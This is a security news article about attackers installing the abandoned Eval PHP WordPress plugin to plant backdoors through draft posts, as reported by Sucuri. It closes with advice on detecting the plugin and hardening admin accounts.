Hackers Abuse Eval PHP WordPress Plugin To Deploy Backdoors

Researchers found active exploitation of the Eval PHP WordPress plugin to deploy backdoors on target websites. Since the plugin remained abandoned for some time, it became trivial for the threat actors to abuse its inherent vulnerabilities.

Eval PHP WordPress

Eval PHP WordPress Plugin Abuse For Backdoors

A recent post from Sucuri elaborated on a malicious campaign actively exploiting the outdated Eval PHP plugin for installing backdoors.

As explained (and as evident from the plugin’s official page), Eval PHP received its last major update 11 years ago. The plugin seemed to facilitate WordPress admins in adding PHP codes to an article or blog, disabling PHP error messages, and performing other related functionalities. With time, the plugin stopped receiving updates from its developer, eventually remaining as an abandoned plugin in the WordPress repository.

However, despite remaining dormant for a decade, Sucuri observed a sudden spike in its number of installations in April 2023. Hence, they delved deeper, only to unveil the malicious campaign exploiting the plugin.

Briefly, the researchers noticed that the threat actors are using the Eval PHP plugin to infect websites with backdoors. For this, they first sneakily install the vulnerable plugin on a target website. This step remains easy given the plugin’s availability on the official WordPress plugin repository.

This timeline matched with the researchers’ observations regarding an ongoing malicious campaign compromising websites with backdoors.

As Sucuri explained, the attackers tried to create draft posts on target websites to execute malicious PHP backdoors. In some cases, the attackers even created drafts with admin accounts.

Check Your Websites For Eval PHP

According to the researchers, the most effective way for WordPress admins to detect a compromise on their websites is to look for the presence of Eval PHP, especially if they didn’t install this plugin themselves. Having this plugin on a website clearly shows a compromised state, with the potential presence of backdoors.

Besides, Sucuri also recommends securing admin accounts with 2FA, keeping the site updated with the latest patches, and running a robust WAF to avoid malicious exploitation.

Attribution link